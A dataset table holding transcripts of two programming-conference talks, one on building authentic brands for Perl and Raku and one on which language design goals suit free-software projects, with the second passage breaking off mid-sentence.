doi
stringlengths
17
24
transcript
stringlengths
305
148k
abstract
stringlengths
5
6.38k
10.5446/53254 (DOI)
Hi everybody, my name is Nigel Hamilton. I'm just another Raku and Pearl hacker based in Bath in the UK. And I love Pearl and I love Raku. But recently at the last contract, the management decreed that no new things would be written in Pearl and they pronounced it like Pearl with a U. And that was really sad and disappointing. Because I know like most Pearl programmers, most Raku programmers, we like making new things. So that was really sad to hear. Because unfortunately, Pearl and Raku are in the fight for their lives. And we have to compete for mind share for hearts and minds in an increasingly crowded marketplace. And if you look at all the brands here, we need a way of having our brands standing out, holding their position and not only just holding their position but growing their position. So how can Pearl and Raku take their place in the hearts and minds of developers? Because unfortunately, it's not enough just for the language to succeed. In fact, the ecosystem around the language also needs to succeed. If you think of Node and NPM and other packaging systems, it's the core language but it's also the packaging system and the other elements that go around it. And they also need to have strong brands. And we stop and think about it. I think we can actually realise that this problem has been going on for a long time. In fact, I'd like to suggest that it was happening even before that fateful mug got thrown in the year 2000, which saw the beginnings of the Pearl 6 effort. I think we had a branding problem back then. And I want to take you back there. Because I think we need to make peace with the past. So jump in your time machine of choice and join me back in 1999. And let's see if we can exercise some of the things that happen then so that we can move forward. Well, welcome to London, 1999. This is Canary Wharft, one of the banking districts. And I'm a new visitor to the UK. I'm on a working holidays visa. And I'm starting work at Canary Wharf at a global bank in the web technology department. All good. One of my colleagues introduced me to this new search engine, Googly, which was in beta. And I thought, well, that looks pretty cool. But I use Ulta Vista with their and their brand value was smart is beautiful. And they used to have a nice kind of mountain range as part of their icon. But as things develop with Ulta Vista, it got more and more busy. And I wonder, what if their brand value had been smart is simple. Well, things were going okay in the web technology department. There were lots of there was lots of work around the bank. And one of my first projects was to create a system for the audit department, which would be rolled out in New York, Tokyo and London. And it was used by top level management to sign off on their various audit points. And it was written in Pearl. And Pearl did a great job. And within two months, we had this into production. And we had happy clients in the bank, which was all good. But then things took a slight turn for the worse. My JBoss wanted help with a Java applet that we could write once and run anywhere around the bank. It was going to be a trading chat app, which all the traders were going to be able to chat and communicate with each other. And it was going to run fast and quick. And my boss at the time was really excited about all this. But I was a little bit worried, because my experience of Java and especially Java applets, was it actually was a bit clunky. But the marketing department at Java was going to overdrive and the legal department too. And we see here the Java page in 1999 with a logo in the top left hand corner and various TMs scattered around the page. And later that year, those TMs could then be changed to R because in the UK, trademark office, the intellectual property office, they were officially registered as a trademark. So their legal department was doing the right things as well. And they were generating buzz because they were reaching out to various corporate markets. And okay, the enterprise computing era was about to arrive just as soon as that Java applet finishes loading. But nonetheless, they had a story to tell. And even though their Java SDK was only in version two beta release, they were already addressing various industries, aerospace, banking, etc. So the marketing and the legal department were really building an effective brand stack. They'd at the very base, they secured the legal rights to the brand. And then on top of that, they were developing values that could be associated with the brand values like ubiquitous technology, Java would help develop a productivity, enterprising innovation. These are some of the values that the marketing department was looking to associate with the Java brand. And these values then found their ways into various messages right once run anywhere. Oh, there's no pointers in Java. That's going to be the future of the web. And these messages were directed at audiences, developers got certain types of messages, industry leaders got their messages, and enterprise managers, like my boss, like my J boss. But a brand stack is nothing if in the end it doesn't make a connection with its audience. And ideally that needs to be what has to be some sort of emotional connection. So you might like to think of some of your favorite brands, your favorite beer, what's your emotional connection with that brand? If that brand was taken away from you, how would you feel about it? If you could no longer drink your favorite beer, for example. So the brand stacks important. It's a way of connecting with customers, with users. And ideally, each level of the brand stack needs to work with each other. So for my J boss, he was excited and buzzed up about Java. This trader chat app was going to be fantastic. He had hope that he was going to get an even bigger bonus this year. And he was inspired by all the talk of enterprise computing on the Java website. And Java, some of my systems, was paying a lot in marketing dollars to keep the buzz going, to effectively have the flow of blood going between all these messages and back to the brand to grow the goodwill of Java. And to some extent they succeeded. But for me, as a developer, I got to admit I had a different set of emotions because having been given the trader chat app, I'd spent about a week and a half underneath my desk power cycling my computer because every time I loaded the applet, it would just bring my computer to a complete halt. So my emotions were quite different. This Java applet really wasn't going to work. And I was anxious about it. I was frustrated that the Java messaging didn't actually relate to the Java reality. The truth was that this applet was not going to be able to roll out everywhere around the bank. It could barely run on my machine. So I dreaded the idea of going down to the trading floor, showing these traders and watching them gaping as the thing took ages to load up and they just thinking of the money that was falling on the floor. So in this case, the brand stack is backfired. Because rather than having all those positive emotions, actually there's a cooling off as the messages don't quite add up with the brand values and the brand itself leaks reputation. So for me, Java's brand stack in 1999 looked something like this. Yes, it had a bit of legal foundation. Yes, they had some values that they were going after. And yes, some of the messages related to those values. But the reality didn't quite add up. And to survive as a strong technology, you need good technology, but you also need a strong brand stack as well. In fact, ideally, you need an authentic brand stack, where all the layers of your brand stack actually add up and the messages are consistent. And when this happens, your brand starts to grow. Instead of leaking goodwill, like a battery, it starts to take charge, reputational charge as things grow, as the various emotions and feelings are backed up by messages, the messages are coming true for the target audience. And when this happens, you get a magic result, which is audiences will introduce new audiences to your brand. It'll become a word of mouth brand rather than one that's just pumped up by corporate marketing. And in this way, the brand can really take off. And that's the essential feature of an authentic brand and something that I think you can see would be really useful if you're interested in doing that. So, I'm going to start with the first client, Pearl and Raku. So, it's around about this time I got out from under my desk, rebooting the machine to try and get the Java applet to run. And I took a call from my client, my first client in the bank, in the audit department. He's the head of audit. And I said, no, I've got some good news. The Pearl program, the Pearl system he wrote is doing really well. Some of the technology behind, have you got anything you can send me about Pearl? I said, sure, no problem. So, I mean, I was busy with the Java thing. So, I quickly sent him a link to Pearl.org in 1999. And something good to say about this page is that unlike the Java page, it fully loads. But then after a couple of days, the head of audit called me back and said, no, I just got a couple of questions. And when an auditor asked you, I've got a couple of questions, it's a scary moment. When the head of audit for a global bank asked you, I've just got a couple of questions. It's absolutely terrifying. And he was asking me questions like this. No, Jim, you said to me that the version of Pearl that we've got in production is version five. Why on this website is it saying Pearl's in version two? And my answer was something like, well, I mean, I know Java's in version two, but I mean, Pearl is more mature than Java. And yes, it's version five. So, I'm not sure why it's two. And then came the next question. Do we need to have a license with O'Reilly and Associates to use Pearl? No, no, no, no, no, no, no, no, O'Reilly and Associates, they just sell books. Yeah, no, don't worry, there was a camel on a book once and then that's O'Reilly and Associates. No, no, Pearl isn't owned by O'Reilly and Associates. And then the next question, here's the Pearl Institute. What do they do? They're dedicated to keeping Pearl available. Well, in February 1999, they reported discrash, files are missing and we're trying to put the pieces back together. Well, I don't know why they're saying that on the main page for Pearl, but I mean, the truth is that actually there's a comprehensive archive network with almost 100 sites around the world where Pearl is mirrored. So actually it's a really robust platform that the bank can rely upon. It's not just one corporate interest, it's mirrored in multiple places. And then finally asked, well, what about the Pearl Institute? I read here that actually it's going to dissolve. They voted to dissolve and now it's part of the Pearl Mungers. And it was at this point, like I felt like putting up my hands and going, ah, truth is the Pearl Mungers, they're just a group of camel herders that like writing software. I really felt like bailing out at that point. But I believed in Pearl and Pearl's technical stack. Sadly, its brand stack was all over the place. Because in 1999, it seemed that Pearl's brand stack was taking a loan on O'Reilly or O'Reilly was leaning on Pearl. But either way, we didn't have a strong foundation for the basis of a strong brand stack. We certainly didn't have any clear values that associated with that brand. We didn't have messages that embodied those values and we weren't addressing audiences with those values. And the emotions, well, I had positive emotions because I could use Pearl to get things done and it worked. But Pearl's brand stack wasn't helping me. So it was a little wonder then, only a year later, that mug got thrown at the Pearl Conference, which sparked the beginnings of Pearl Six. I'm sure there were some technical problems with Pearl and I know there were. But at this point in 2000, Java didn't even have regular expressions. They had technical problems too, but they had a much better brand stack. And that was the opportunity in 2000. It was to make amendments to the tech stack, but it was really to seize the opportunity of building a brand stack. So I think we have to make peace with it. It's happened. We can't change what's happened in the past. But we do have a chance to do something about the future. And I hope we can think positively about what we can do here. And that's what I'd like to do now. I'd like to jump back into the time machine. But this time, let's go forward. Let's go to 2025 and see what Pearl and Raku could look like in 2025. Well, the first thing to say is that in 2025, the Pearl Foundation is no longer. They've decided to become an authentic brand. And being an authentic brand means that all those layers need to add up. And the truth is that in 2000, the Pearl Foundation had a great opportunity to not only represent Pearl, but also Raku. And so the old name of the Pearl Foundation really wasn't an honest representation of what the Pearl Foundation does, because actually it's more than that. And so they decided to rename themselves the Artistic Software Foundation, which they could then register as their own independent trademark and then build an authentic brand stack. And in 2020, they reached out to the community to say, well, what should the brand values be for the Pearl Foundation? And thanks, by the way, to those within the community who answered this survey. And we can see here on the left-hand side the top three values of the TPF in 2020, but also the top three values hoped for in the future. And what the survey showed is that the users or the members or the people who rely on the TPF wanted it to move from a kind of a volunteer support of organization to be more passionate about the software projects and communities that we support, to be more transparent, more professional and more trustworthy. And that's what the TPF did in 2021. They continued this process. And with this rebranding effort, they reached out to the community again. And there was a vote. And this was the logo that got voted in. But there were other professional logos to choose from, and even different names. It wasn't necessarily the Artistic Software Foundation. And I should say this view of the future, I've taken quite a lot of artistic license for it, pardon the pun. But it's just one future, and it's just meant to be kind of a guide. Because the Artistic Foundation in 2025 needed to have not just a small number of brands, they needed to have a successful flourishing ecosystem of brands to support each other. So how did Raku go in 2025? What does Raku look like? Well, the good news is that Raku has continued its journey to build an authentic brand stack and goodwill and reputations growing in its brand battery. And how did they do that? Well, in August 2020, they set up the foundations. They started putting in place the legal foundations for their brand stack. And the trademark was registered in the UK in August 2020. There's a little bit of a stumbling block at the US Trademark Office. The examiner there said, well, hang on, you're not using Raku as a trademark on your website. You need to put your hand up and say, hey, this is being used as a trademark. And so thanks to Daniel Stockwell, who works both on the Raku Steering Committee and in the TPF Legal Committee, he was able to make the change here to help satisfy the examiner's concerns, which meant that later Raku could then also be registered as a trademark in the US. And then later in 2021, Raku Community came together again to update the website with its trademarks to signal to the user community that actually we're using this name and this is the base of our brand stack and we're proud of it. And they updated the website to actually show what their values are, rather than saying we intend to carry forward the high ideals of the Perl community. They were actually specific. During 2021, they did a survey and they found out what the actual values were of the Raku community, the distinct values, and they were able to actually clearly say what those values were. And then once they had those values, they could then begin to reach out to the early adopters for Raku. Raku's mascot in 2025 still loved with its common law protection TM there and it's clear license that Larry Wall wrote when he created Camellia. And Camellia's got deep and hidden meanings. So yes, there's camel in her name. But those that P6 now is kind of like a scar that the community uses to remember all the hard work and effort that went in to getting Raku to where it is today in 2025. And that's something that we appreciate about the logo. Because in 2025, Raku has become known as a productive, general purpose dynamic language. It's known to be optimized for fun. So no matter what level of ability you are, you may be a new starter or a seasoned programmer. Raku has the ability to get you into a productive state quickly. And the teaching resources that came out in 2021 helped computer science lecturers around the world create courses in CS 102 that helped give new students a taste of different paradigms, functional, procedural, etc. And then later subjects in the computer science curriculum picked up Raku as a teaching language. So in 2025, people were graduating with skills in Raku. Schools were starting to take up Raku examples in their teaching because they wanted their students to be ready for what they were going to see at university. And Raku's brand stack was starting to grow organically. No big marketing budget required because its values and its messages and audiences were adding up. This meant that it started to grow. And the emotions were all good. Programmers were describing a sense of joy and elevation when they were coding in Raku. And from the business point of view, they were happy they had productive programmers creating software with Raku. Now, we are missing a piece in the puzzle here. What's this brand? In 2025, where's Pearl going to be? Well, in 2021, now that the Pearl Steering Council had been formed in 2020, it was time for Pearl to take its place in the marketplace of ideas and software that it needed to compete against. And for the first time, it took up the challenge of building its own unique distinctive brand stack. And in 2025, the Pearl brand is growing. It's expanding. The unique values that were found in 2021 are still there. The messages still add up and the audience is still appreciate Pearl for what it is. And there are lots of positive emotions around Pearl. So in 2021, the Pearl.org website got a revamp. And at the moment, at 2021, the site just said, well, that's why we love Pearl. It didn't really clearly say why we love Pearl. And in 2021, we found out because Pearl 7 represented a great opportunity to uncover what Pearl, the branch trajectory for Pearl, where the values are now and where the values will be in the future. And rather than calling it Pearl 7, actually, the Pearl Steering Committee decided to call it a new name, Pearl something. And I don't know what that name is, but it's there. And there's that camel. And when I saw this, I almost had post-traumatic stress from 1999 because it's still there. For some reason, we are using a publisher's brand on our website. So in 2021, we finally said goodbye to the camel. And importantly, we didn't replace it with anyone else's camel. Because to compete in this marketplace, we actually need a distinctive brand that no one can confuse with anything else. And frankly, it's something that Pearl deserves. And I think a root vegetable that makes you cry is probably also not something which would embody those values that were uncovered in 2021. So no, instead, with the help of the artistic foundation, or the Pearl Foundation, the Pearl Steering Committee, once they established what the value trajectory was, asked for three new brands to be designed, three logos to be designed, professionally designed, which then went out to the community for voting. So the community could finally get a sense of ownership over this brand, a sense of attachment to it, which is something that has previously not been the case with the camel and the onion. And so there's a real opportunity here for a fresh start, not just for the tech stack, but importantly for the brand stack. And this new alias for Pearl seven was also embodied as a literal alias inside the Pearl package so that you could invoke the Pearl interpreter with this new alias as well. And by 2025, ultimately users would sometimes refer to the language by its alias and not just simply Pearl. So by 2025, with an authentic brand stack, actually Pearl is adding up to its user base. It has clear values which result in messages that are clear. The audience is then here messages that relate to the reality of Pearl. And there's positive emotions. And there's no reason why Pearl can't have its own distinct space. But it'll need an authentic brand to do it. And in 2025, there's no reason why the emotions that are associated with the Pearl brand aren't ones like this. It's still a brand that we love. We're satisfied using it. It does the job. And we trust the source from where it comes. We trust the history and the testing and the blood, sweat and tears that have gone into creating Pearl over the past 30 years. And the Artistic Foundation now has in 2025 a clear set of projects and communities that it supports. And each community has its own distinct brand identity. And we're able to then support those brands to support themselves. Because in 2025, for us to succeed, we will need strong authentic brands. I think we can do it. Because actually, there's something that money can't buy with both Pearl and Raku. 30 years of effort, technical effort, volunteer effort, community effort, blood, sweat and tears has gone into Pearl. There's no amount of marketing budget that can buy that. There's a lot of heart in Pearl. And I honestly believe it just needs to be unleashed with a proper brand stack. And we can create a brand that the community feels a part of. And likewise with Raku, it also needs to take its space. And it also will need a strong brand stack. Let's hope we can get there. Thanks for listening.
The TPF is passionate about helping our software communities flourish. This is an update from a legal and marketing perspective on the communities' brands and some suggested next steps to help them flourish.
10.5446/53256 (DOI)
In this presentation, I'll be discussing a question that is very important to me. What makes a programming language good? Not just in general terms, but specifically good for writing free software. Before diving into that, though, I'd like to take the opportunity to introduce myself to those of you who don't know me. My name is Daniel, but some of you may know me as Code Sections if you've seen me around the RACU community. I'm a full-time pre-software developer, and my primary programming language is RACU, although I also program in Rust or other languages as the need arises. I also serve on the RACU Steering Council. Before switching to software, I was a practicing attorney with a law firm in New York City, and though I no longer practice, the mindsets are a bit more similar than you might think. Oh, and one other note, the icon that I use, I have noticed that it is pretty similar to Camilla, the logo for the RACU programming language, but I wanted to mention that that is just a coincidence, though a happy one that makes me smile every time I notice it. With that out of the way, let's dive in. What makes a programming language especially good for writing pre-software? In the course of answering that question, there are three different points that I hope to convince you of. First, that pre-software projects are different, and when I say different, I really mean that in two different ways. First, pre-software projects are different from other types of software projects. And second, and perhaps more surprisingly, pre-software projects are different from the image that many people have of them. Second, I'd like to convince you that there are some excellent languages out there that just really aren't very good for writing pre-software. They're good at other things, but they're not good at that. And third, and relatedly, I'd like to convince you that the ideal pre-software language should be different from other languages, even other excellent languages, because it's aiming at different sorts of projects that should have different design goals. So let's start by saying how pre-software projects are different. I'd like to start with an even more basic question. What is pre-software? What are typical pre-software projects? A lot of times people talk about pre-software by mentioning Linux or Firefox or other high-profile open-source projects. And some people have said that pre-software is like building a cathedral where you have a group of architects and then many laborers who execute their plan. And other people have said, no, it's like a bazaar where many people work together along similar lines, but there's little or no central organization. But somehow out of that chaos, order emerges. Those are both kind of dated. More recently, I've seen a blog post that said pre-software is really like nuclear power where you have a huge team that pours a lot of time and energy into an initial reaction, hoping that it will become self-sustaining and produce even more energy in the end. And I just don't really buy any of those. They all have some good points to them, but all of those analogies miss one really important thing. They miss the fact that Linux is a penguin. What I mean by that is you shouldn't think about Linux or Firefox when thinking about pre-software projects. Yes, a penguin is a bird, but if you think about penguins when thinking about birds, you're going to end up very confused about birds and have all sorts of the wrong ideas. A penguin and Linux are both exceptional examples that are not good to generalize from. And specifically, Linux and Firefox and these other high-profile projects are exceptional in terms of their size. Most pre-software projects are extremely small. This is a study from Redmonk and before thinking it doesn't prove my point as well as it does, notice that the axis is logarithmic. So here, diving into their numbers a little bit more, they found that half of the active pre-software projects had only one contributor a year, 70% had one or two contributors, and 87% had five or fewer contributors. Another group of academics took a look at the same issue. They came at it from a slightly different angle and looked at truck factor, how many sort of core contributors would it take for a project to really be in trouble if they were to go away. But cutting the other way, they took a very narrow definition of what it meant to be popular. They started just with the 100 most-starred repos in six language and then removed any that were in the bottom 25% in terms of other measures of popularity, which cut out the majority of them actually. So this is just the very most popular projects. But even in that sort of rarefied company, they found that 34% had a truck factor of just one, one primary developer. And another 30% had a truck factor of two. It's nice to have academic studies that give a big picture view, but it's also helpful, I think, to dive into a more concrete example. So in that spirit, I'd like to talk about Impress.js, which is a somewhat randomly chosen project, but it's the software I use to write the slides that you're watching right now. And I really enjoyed using it. I thought it was a great project. It's very popular, you know, Hins of Thousands of Stars on GitHub. And when I open its contributor page on GitHub, I see that it has 77 contributors. Those aren't all in the same year, but I looked at it a little more closely and it had 16 contributors in its first year. So that would put it outside of the 87% of the projects that Bedmunk said had fewer than five contributors. So it, you know, on first look, seems like an exception to the rule that free software projects tend to be small. But let's look a little closer. When I dove in, its top contributor had 148 commits. The next contributor had 51 commits, then 14, then six, then just four. So this is not really a story of a project that has, you know, is a bizarre with 70 different people all working together. It's really a story of a project that has a couple of main contributors and then other people who submitted, you know, one-off patches or had particular features that they were interested in implementing. And I want to be clear that I'm not knocking that type of contribution. In fact, I did it myself, but, you know, I found a couple of features that I wanted to add to Impress while I was writing this presentation and submitted some PRs. And I hope that that was helpful to the project. And I think that that sort of contribution absolutely can be. But I also think that if we're thinking about things in terms of a bizarre model, we're probably going to have the wrong idea. This is not a large group collaboration. This is a story of a couple people working as main authors and other people helping out, but in a different way. And I said a couple people, but let's take a look at those couple of main authors. And they're actually, well, we can notice the timing is kind of interesting. The first author had nearly all of their contributions in 2012. After that, the next main author started contributing in 2018. So this really isn't even a story of two people working together. This is a story of a project that had a primary maintainer and then several years later a different primary maintainer. So it has really been not a solo project, 77 contributors, but a project that has had a solo lead developer. Again, very different from the bizarre sort of model. So yeah, that actually makes me think free software is not like building a cathedral or running a bizarre or running a nuclear power plant. Writing free software is like writing a novel. Let me play out this analogy a little bit. As I just walked through, in both cases, you have one author or maybe a small handful of co-authors. In both cases, there are many other contributors for books that editors, agents, publishers for software, all the contributors, bug fixes, documentation, et cetera. In both cases, those other contributors play a really essential, invaluable role, but they're not playing the same role as the author. And in both cases, the author is very likely to be part of some sort of broader community, literary community, coding community, but the actual writing of the code or of the prose is a solitary activity. So if that's the mental model we have, we think of writing free software as akin to writing a novel, what consequences does that have for us? Well, I want to return to these points. Free software projects are different than other software projects. They're less collaborative, more like writing a novel. That leads me to believe that some excellent languages are not good for writing free software. I want to turn to that next, and then that will sort of bleed into our discussion of what design goals a free software language or a language targeting free software should have. So I want to talk about free programming languages that I personally think are excellently designed and there are ones that have gotten a lot of buzz and attention and developer mind share. And I think that even though all of them are very different, all of them are especially poor fits for writing free software. The first language I wanted to mention is TypeScript, a JavaScript superset that adds types and transpiles to JavaScript and really targets, among other things, front-end development and executing in a browser. Second, Go or Golang, a compiled garbage collected language that targets fast compile times and is very active in sort of back-end server web development. And finally, Rust, a compiled language with no garbage collector that aims to equal C in performance and is very useful for systems programming and has gotten a lot of adoption. So these languages, as I said, are three very different languages. They don't have much at all in common other than the fact that they all have gotten a lot of attention and buzz lately. And for good reason, I think, I think all three are excellently designed languages. But they have one other thing in common, the sort of organization that first created them. So TypeScript is a Microsoft project. Go is from Google. Rust came out of Mozilla and now has gotten a lot of support from Amazon and really sort of who's who of large tech companies. And that's exactly what these have in common. They are all the product of large tech companies. Why does that matter so much? Well, I think it matters because it influences their design goals. And I say that not just because I've used these languages and have a sense of what their design goals are, and you can sort of read between the lines and their documentation, but because all three of these languages have actually been remarkably explicit about what their design goals are. This is true for all three languages and I have some links in the notes for this presentation if you're curious about other languages. But I'd like to particularly focus on a talk and paper that Rob Pike gave describing Go. He said, among much else, and really the whole talk is worth a read, but he said, Go is a programming language designed by Google to help solve Google's problems and Google has big problems. Now, a lot of people have focused on that last bit that Google has big problems, big in the sense of the scale that they operate at, being very large. But I really want to focus in on that middle part. This language was sort of from start to finish designed to solve Google's problems. And I think the same is true of the other two languages I mentioned. TypeScript was designed to solve Microsoft's problems. Rust was designed pretty explicitly to help Mozilla build a better Firefox. And there's nothing wrong with any of those goals. I want to be clear. I think that those are good goals to have and it makes sense that some really good programming languages have those sorts of goals. These large tech companies are exactly the sort of company where it makes sense to invest money in developing a whole new language. And as Rob Pike said, they do have big problems. So it is absolutely, I can understand why some languages come out of that environment. But I think that that environment is very different from the sort of solo developer free software or code as novel environment that is really important for free software language to target. To explain what I mean, I'd like to look at three different features of the big tech environment compared to the free software code as novel environment. And then for each of those features, look at how that feature of the environment impacts the language design goals of a language targeting that sort of environment. So first in big tech, you have really large teams, small teams in free software as we've talked about pretty extensively. Big tech also has high turnover, just like the law firm I worked at. It's not at all uncommon for people to start their career there before quickly moving on to somewhere else and they're sort of constantly hiring from people who have just completed their CS education. Free software on the other hand, a lot of these small projects have one maintainer for decades, but even if it's not quite to that extreme, the turnover is much, much lower. In big tech, people are there because they're getting a paycheck. They may have other motivations as well, but that is a sort of defining feature of the job is that it is a job. Free software developers tend to be much more self motivated. They may or may not be getting paid at all. They are, they're getting paid probably less than they would make at a different way that they could be spending their time. So the motivation is pretty different. So how do those features of the big tech environment impact design goals of a language targeting that environment? Well, when you've got a large team, you really want to have a standard code format. You want your, to use tools like Go format or Rust format or prettier.js to make all the code look exactly the same because you want everybody on the team to be able to read each other's code just like they wrote it themselves. More broadly, you want there to be just one way to do it. That plays out in syntax and style guides, but also in standard library design, also in the, just the amount of syntax, the language design itself. And in language design choices, like limiting customization, like operating or overloading and other ways that people can sort of make the language their own. And all of that is in service of avoiding dialects. So, it is really bad if Bob writes some code and then Alice writes some different code and those two, even though they're programming in the same language, might as well be programming in different language and they can't read each other's code. In that talk about the design of Go that I mentioned earlier, this was explicitly called out as one of the design goals for Go that they wanted to avoid subsets or dialects of the language. Things are similar when we talk about high turnover, those two do tend to go together, but I think high turnover really creates an emphasis on the speed at which people can pick up the language. So, you want it to have a familiar syntax. All of these languages bear more than a passing resemblance to C and that's not at all a coincidence. More broadly, you want the language to be easy to learn, not just in terms of syntax, but in every other aspect of it. If people are only there for a few years, you don't have time for a long learning curve to really pay off. Again, Go was very explicit about this value and it is famously easy to learn and even in just a weekend to pick up the basics. Rust is a bit of an exception here in that it is not as easy to pick up. But I think it is clear if you spend any time in the Rust community that they take the value of being as easy to learn as possible consistent with the nature of the language extremely seriously. If there's anything better from the perspective of a big tech environment than having a language that is easy to teach new hires, it's having a language that you don't need to teach them at all because they already know it. So it is even better for language design if you can make the language popular in whatever way possible. And I think Microsoft and Google and to a lesser extent Mozilla have put a lot of emphasis in evangelical efforts behind their language and making it easy to gain that sort of popularity. The final feature of a big tech environment that I'd like to focus on is that people are getting paid. I want to be both tactful and precise in talking about this because it is, of course, the case that there are many absolutely amazing programmers who are working at these large tech organizations and working primarily for the paycheck is no reason at all that someone can't be a way better programmer than I'll ever be. But the thing about money is that everybody likes money. So even if many of the people at an organization on a team are really great programmers, once you start paying people, there is the chance that at least some people there are just sort of doing the minimum they can get away with to not get fired or to get promoted or whatever the bar is. And I think that that thinking influences the design of languages targeting that environment. So when you have that sort of environment, a language really wants to avoid foot guns. Like there are some features that can be used by someone in a really clever way but can also be used to shoot your foot off, then the language is much more likely to take those out if you are targeting this sort of environment. Again, being a little more general, the language wants to prevent corner cutting in whatever way possible. Even if that means being more verbose, if it makes things explicit and people have to sort of lay out every step they are going through, that can make it easier to deal with the person who might be inclined to cut some corners if they could get away with it. And finally, the language from a design perspective wants to optimize for making the code as reviewable as possible. Small diffs where you have a style that doesn't indicate that lines have changed when they really haven't. It also means bigger language design issues like discouraging interactive programming. You don't really want from this perspective a program that you have to fire up a repel and really engage in dialogue with the code that may be easy for someone to write and easy for someone else to maintain later, but it's hard for someone to read a patch set and really have a sense of whether it's a good change or not. So it is harder to review. So that's the big tech environment. You've got languages that are built for a large team with high turnover where people may be inclined to cut some corners, or at least some of them. And I think that you can hopefully get a feel for the sorts of things that, the sorts of directions that that pushes the design of the language. I want to be clear that everything I said over there were values that are higher priorities for that environment. I'm not saying that those are bad things, certainly for our free software language. Certainly I think that free software languages should aim to be easy to learn and have a reviewable code. But I think that as I'll get into in just a minute, those aren't quite as high a priority. Reviewable code is great, but if you know that many of your people using the language are going to be in solo projects or very small teams, there probably won't be the same opportunity for code review. So that's not going to be the same priority. So what priorities will there be over here in the free software world? Well, when you're dealing with a small team, you absolutely want the language to be as powerful as it possibly can be. Free software is, or really anytime where you have a small team, is absolutely the sort of underdog when it's going up against big tech companies. I want to be clear that it is absolutely possible to do a better job with a small team than it is with a huge team. I think, you know, I was using Impress because I think it is a better way to write a presentation than Google Slides, even though it is basically a solo project and Google Slides is funded by the most powerful, best funded tech company in the world. Similarly, I think Mastodon with a very small development team is a better social network than Twitter with a much larger team. So it is entirely possible for small teams of committed free software developers to produce better software than huge tech companies, but they've got to acknowledge that they're the underdogs, so they need every advantage they can possibly get. So it is very important that the language be absolutely as powerful as it can be. One of the best ways for a language to be very powerful is for it to be very expressive. You know, if you can say more with less, you can write your code faster, you can be more clear, and that is a great way for a small team to catch up to a much larger team. And finally, it is really important for a small team to have their language be composable, especially in the free software world where we don't have any licensing difficulties, we're happy to use something no matter how copy left it may be. And free software, the projects have a small team individually, but the free software world as a whole is very large, so to the extent you can follow the UNIX philosophy and have small composable programs, that again allows a small team to really keep up with a much larger, better funded team. Low turnover has similar effects, but I want to focus on the sort of teachability aspect. Of course, it is great for a language to be as easy to learn as possible, but when you're in a low turnover environment, it's perhaps even more important that the language for word mastery. So even if you can't quite get the hang of it at the deepest levels for quite a while, there's time for that level of mastery to pay off. There's also time for domain specific languages to pay off. You can almost think of a domain specific language as a language that you always have to teach to new people who join a project. There's no chance they used it at their previous job or project or whatever because it is specific to the language, to the domain that the project is actually in. So that is a disadvantage of doing specific languages, but when people stick around long enough, the advantages are to vastly outweigh that because they offer extreme power and ability to impose constraints and make the program much, much easier to reason about. So the ideal programming language for a low turnover environment would really support constructing domain specific languages to solve particular problems. And now I have expressiveness up there on the slide for a second time, but in a slightly different way this time. The main reason languages might limit expressiveness is to prevent people from writing code that other people can't read, but in a low turnover environment, there's much more room for a project to develop its own sort of house style. And even if it writes code in a bit of a different way than other users of the language, you know, that's fine if the expressiveness allows that. And in fact, not only is it fine, it's actually very important that the language be expressive because people are going to need to hold the code in their head much more so than they need to or even can in high turnover, large team environments. You know, if a code base is two million lines instead of a million lines, that is really not the end of the world because no one was going to read the million lines anyway. But in a low turnover environment, if a code base goes from 5,000 lines to 10,000 lines, that does make a pretty huge difference because it is entirely possible and even likely that someone is going to be trying to understand and reason about the whole code base. And so to the extent it can be more expressive, more concise, more logical, and someone can sort of hold the whole code base in their mind, that makes the language much better for that sort of low turnover environment. And the final feature of free software development that I wanted to talk about is that people are mostly self-motivated. They may be getting paid, but probably could be making more somewhere else. And some of them are not getting paid at all, working nights and weekends. So that has a few advantages, but it also raises some challenges that a language should try and address. Most importantly, if people aren't getting paid to put up with something, they probably won't. I mean, it's important for every programming language and really every human community to be friendly and welcoming and inclusive. But when you're not paying somebody to put up with nonsense, it is especially important. I know this isn't entirely a language design goal. A huge amount of it goes to the community. But there are some things a language can do in terms of encouraging good documentation. But it's so important that whether it's a language thing or a community thing, it's worth really emphasizing here. And then for the third and final time, I promise, I have expressiveness up on these slides. But this is, again, in a slightly different way. There are a tremendous number of different reasons people are motivated to write code and to write free code, free software. But one of them is the sort of expressiveness, the self-expression, the enjoyment they get out of writing that code. And if every single person writing code to solve a particular problem would solve it in exactly the same way, then it is not nearly as fulfilling to write that sort of code. So if people are self-motivated, the amount of self-expression the code allows them to have is a factor that language designers should consider. And more broadly, if people are writing free software nights and weekends because they want to, it should be fun in whatever way it can be. And in fact, because software developers tend to like using powerful tools and having expressive language features and doing things that fit into all of the other design goals of language targeting free software, it is probably not going too far to say that free software language should be optimized for fun. That last slide might have tipped my hand a bit, but I happen to think that ECU does an excellent job aiming at and at times achieving these values that are so important for an ideal free software language. Exactly how and why I think that is a topic for a whole other presentation and something I've written about on my blog. But I think ECU does a really good job, but perhaps more importantly than that, I think that ECU is aiming at this in a way that so many other languages aren't, which again is not surprising at all. Most other languages were either initially designed by or are these days in large part funded and had their development push forward by huge tech companies who have the sort of scale that make where it makes sense for them to really invest in language design. I think ECU is somewhat unique in how closely it is tied to free software in its sort of origin story and how much it continues to be so closely associated with free software. So I don't think that it is at all an accident that ECU is aiming at free software use case in a way that many other languages, including some excellent languages, just aren't aiming at. But I, while I don't think it's an accident, I also don't think it is a guarantee. So I guess part of my goal with this presentation is a bit of a call to action to say, I hope that these values, I hope that you agree that these values are really important if a language wants to target free software. And I hope that I've persuaded you that it is worth doing so, and I hope that together we can keep Raku targeting that use case and aiming at these sorts of things. I hope you enjoyed this talk and I look forward to your questions. So I actually have a point that I'd like to expand on just a little bit based on one of the talks yesterday before we get to Q&A from this talk. And specifically, it's, I'd like to say something that is expanding based on Matthew's presentation on surprisingly unsurprising features of Raku. And what he said was, you know, that even after he has been programming Raku for a long time for literally longer than Raku has existed, he's still finding things to learn and like interesting new features of the language that he hadn't realized were just that unsurprising. And I think that really hits at what I'm getting at with like rewarding mastery versus ease of learnability. Like I absolutely think that Raku and any language should prioritize learnability absolutely as much as possible. I mean, if I didn't believe that I wouldn't spend time writing introductory blog posts and contributing to the docs. And, you know, so like that is a real priority of mine, but I think that at the same time, it is even more important that we have that we build the sort of language that someone can 10 years after they have been using it pretty heavily still be finding ways to level up and that they won't sort of hit a peak and plateau there. So I thought that was a great illustration of one of the points and sort of how we can strike that trade off. But it's not about a, it's not about sacrificing teachability. Like I said, that is still really important to me and something I spend a lot of my time on. So that was sort of the follow up I wanted to have based on yesterday's presentation. Now, 